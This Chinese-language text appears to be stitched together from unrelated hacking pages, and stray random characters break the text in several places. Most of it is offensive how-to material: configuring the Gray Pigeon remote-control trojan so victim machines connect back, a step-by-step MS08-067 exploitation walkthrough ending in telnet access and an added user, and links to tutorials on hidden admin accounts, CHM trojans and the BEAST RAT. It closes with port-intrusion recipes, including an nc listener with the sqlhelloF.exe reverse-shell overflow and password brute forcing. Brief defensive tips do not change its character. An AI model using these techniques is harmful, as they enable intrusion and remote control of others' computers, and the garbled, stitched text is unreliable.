打开软件,看出什么没?有经验的用户就会发现,这把冰刃可谓独特,它显示在系统任务栏或软件标题栏的都只是一串随机字串“CE318C”,而并是通常所见的软件程序名(见图1)。这就是IceSword独有的随机字串标题栏,用户每次打开这把冰刃,所出现的字串都是随机生成,随机出现,都不相同(随机五位/六位字串),这样很多通过标题栏来关闭程序的木马和 后门在它面前都无功而返了。另外,你可以试着将软件的文件名改一下,比如 改为 killvir.exe,那么显示出来的进程名就变为了killvir.exe。现在你再试着关 闭一下IceSword,是不是会弹出确认窗口?这样那些木马或后门就算通过鼠标 或键盘钩子控制窗口退出按钮,也不能结束IceSword的运行了,只能在IceSword的面前乖乖就范了。 点击在新窗口中浏览图片 图1 2.IceSword的“攻” 推荐以后用火狐上网,火狐可以保障你上网的安全,可以 放心浏览,可以屏蔽病毒和木马 火狐浏览器在线更新可防止最近最流行的木马及病毒变种.
其实问题主要是网络的结构问题的理解上面了 灰鸽子(服务端)要求你的条件是对方(控制端)的ip (你要控制的机器,其实它是被你做成了服务器了,叫做服务端)是外网的: 外网的ip是怎么样的? 要求不是192.168.x.x开头, 10.10.x.x也不行, 这两种ip是校园网等的内网常用的ip 通常你们在网吧是不可能令到灰鸽子上线的, 一般来说只有是家庭的adsl才有可能是公网的了。 (一般来说其它的可能都是不多的,例如: 一些校园网内部的服务器,他们的ip是公网的,是不同的) 你们经常看到一些内网的灰鸽子上线的教程可以说都是骗人的,虽然他们说的是可行的, 但是他们不说实现的条件. 但是事实上你们没有这样的条件的! 至于申请域名的事情是对于你自己的ip来说的。(我一会儿具体补充) 但是要明白对方(控制端)的ip也是内网的话,你是没有办法的。 比如我的ip是10.10.2.3 但是实际上我的公网ip是221.4.188.50 这个221.4.188.50是几十人到几百人在用的, 是用到nat技术的网络(至于什么是nat,我不说了啦,你们去网上查查把)。 你永远也不可能直接连接到我的,(直接?) 你要连接到我只有一种可能:(间接连接:中间通过一个外网的服务器,下面的讲解联系到灰鸽子自带的端口映射工具。方法:生成映射服务端,放到他们学校的服务器。不一定要控制他们学校的服务器。上线地址填被你控制机器的IP。) 就是你控制了我们学校的一些服务器:ip是202.192.240.0 这个网络的电脑是公网的.你就可以通过他连接到我 而且还要我告诉你我的ip是什么才行啊. 因为你永远也不知道我的内网ip是什么. 除非你控制了我们的路由器. 至于对方的ip是192.168.x.x这个也是一样的原理. 你永远不会连接到它,除非....(我上面说了拉) 至于自动上线的条件麻,就是多了一个: (其实自动上线的话,是令到你的肉鸡直接连接到你(你的ip)!!! 什么?你的ip会变化的?这时候就用到域名了。域名跟ip是一样的(你可以这样理解),只不过域名固定了。 其实用不用ftp空间都是一样的,如果你的机器ip是符合下面的条件的话,你直接可以用你的机器建立ftp, 如果不符合下面的条件的话,ftp空间是没有用的,肉鸡永远都不会找到你,还说什么连接呢。 这里顺便说一下很多教程在配置:(在配置服务端的时候) “(ip通知)dns解析域名,固定ip,网页文件”的配置
黑客MS08-067漏洞攻击全程演示(图解) MS08-067漏洞是Server 服务中的漏洞,该漏洞可能允许远程代码执行。下面我们来进行MS08-067漏洞远程溢出演示,让我们看看我们的机子是如何轻易的成为人家的肉鸡,被控制的 1.漏洞主机扫描。 使用专业端口扫描工具扫描445端口。获取可溢出的主机列表。 如下图: 2.MS08-067溢出工具进行主机溢出, 格式ms08-067.exe ip 溢出成功标志: SMB Connect OK! Send Payload Over!
3.溢出成功后会开放4444端口,直接telnet登陆上去。 4.Ipconfig确认溢出成功。
5.添加用户确认获取系统权限
6.防范办法: 针对该溢出,我们并不是没有办法,既然是要扫描445端口,然后telnet,我们只需如下的方法就可以解决: 一、及时安装KB958644补丁 二、关闭或屏蔽掉445端口。 三、安装专业防火墙。 《MS08-067》溢出:扫445端口, 溢出 Q:提示 SMB Connect OK! RpcExceptionCode() = 1722 这样溢出成功了么? A:溢出失败,对方开启了防火墙。 Q:提示 Make SMB Connection error:1203 是怎么回事?
A:对方没有开机联网或者没有安装Microsoft 网络的文件和打印机共享协议或没有启动Server服务。 Q:提示 SMB Connect OK! Maybe Patched! 补丁已经打上了。不存在漏洞。 SMB Connect OK Maybe Patched! 这个说明对方已经打了补丁 SMB Connect OK! Send Payload Over! 溢出成功 ---------------------------------------------------- 在cmd下直接运行MS08-067.exe 出现命令帮助 MS08-067.exe
一定要用迅雷下,不然可能下不了 【黑客视频教程-建立超级隐藏帐户】 https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/hideadmin1.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/hideadmin2.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/hideadmin3.wmv 【黑客视频教程-简单制作CHM木马】 https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/CHM1.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/CHM2.wmv 【黑客视频教程-简单破解Access数据库的密码】 https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/Access.wmv 【黑客视频教程-功能超强的BEAST远控木马】 https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/BEAST1.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/BEAST2.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/BEAST3.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/BEAST4.wmv 【黑客视频教程-VMware虚拟机的安装和使用】 https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/VMware1.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/VMware2.wmv https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/VMware3.wmv 【黑客视频教程-Iris网络嗅探器使用与技巧】 https://www.doczj.com/doc/fb5669373.html,/eschool/esafe2/Iris01.wmv
【托管服务qin】黑客常用的几种入侵端口的方法 服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入 侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键)7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功)) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 (这个是正向连接)% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe)* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器,可以用webdav入侵;